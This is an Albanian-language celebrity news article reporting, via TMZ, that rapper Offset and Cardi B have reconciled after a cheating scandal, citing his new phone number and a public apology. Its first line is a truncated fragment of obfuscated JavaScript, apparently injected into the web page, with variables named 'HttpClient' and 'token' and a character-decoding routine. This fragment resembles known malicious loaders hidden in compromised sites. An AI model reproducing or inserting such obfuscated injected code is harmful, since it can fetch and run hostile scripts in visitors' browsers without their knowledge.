;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Rikthehet çifti i famshëm i showbizit

By

Dy muaj pasi Cardi B dhe reperi Offset u ndanë pas një skandali të tradhtisë, një raportim i ri thotë se ata janë sërish bashkë.

Sipas TMZ, reperja do të kthehet në shtëpinë e tyre në Atlanta ku ajo dhe bashkëshorti i saj jetonin së bashku edhe me vajzën e tyre Kulture (gjashtëmuajshe), deri në fillim të muajit dhjetor, kur Cardi B u largua pas një tradhtie.

Sipas burimeve të afërta me çiftin, “Offset e ka treguar veten te bashkëshortja e tij”.

Por si e bëri këtë?

Ai e ka ndryshuar numrin e telefonit dhe do ta përdorë telefonin e tij vetëm për bashkëshorten e tij dhe thirrjet që lidhen me punën e tij vetëm për “t’i treguar Cardi B se ai është shumë serioz në të qënit i sinqertë dhe besnik”.

Madje reperi duket se ka bërë edhe një tjetër kompromis të madh.

Sipas raportimeve të TMZ, ai ka pranuar që mos të lejojë asnjë fanse femër pranë tij gjatë paraqitjes në Super Bowl në Atlanta, këtë vikend.

“Ai dëshiron që Cardi ta dijë se ai është serioz për martesën e tyre”, ka thënë tutje ky burim, transmeton Klan Kosova.

Më 5 dhjetor, TMZ kishte raportuar se martesa e çiftit ishte në krizë pasi kishin dalë disa mesazhe online nga muaji qershor – vetëm disa javë para se ata të bëheshin prindër.

Në këto mesazhe, Offset i kërkon një gruaje që të kenë një marrëdhënie seksuale treshe me të.

Offset, në ditëlindjen e tij, kishte vetëm një dëshirë: të pajtohet me bashkëshorten Cardi B.

Reperi kishte postuar në llogarinë e tij në Instagram një video me kërkim falje për Cardi B duke thënë se “të kam turpëruar, të kam bërë të çmendesh. Kam marrë pjesë në diçka që nuk duhet të merrja pjesë, të kërkoj falje”.

Artikuj të ngjashëm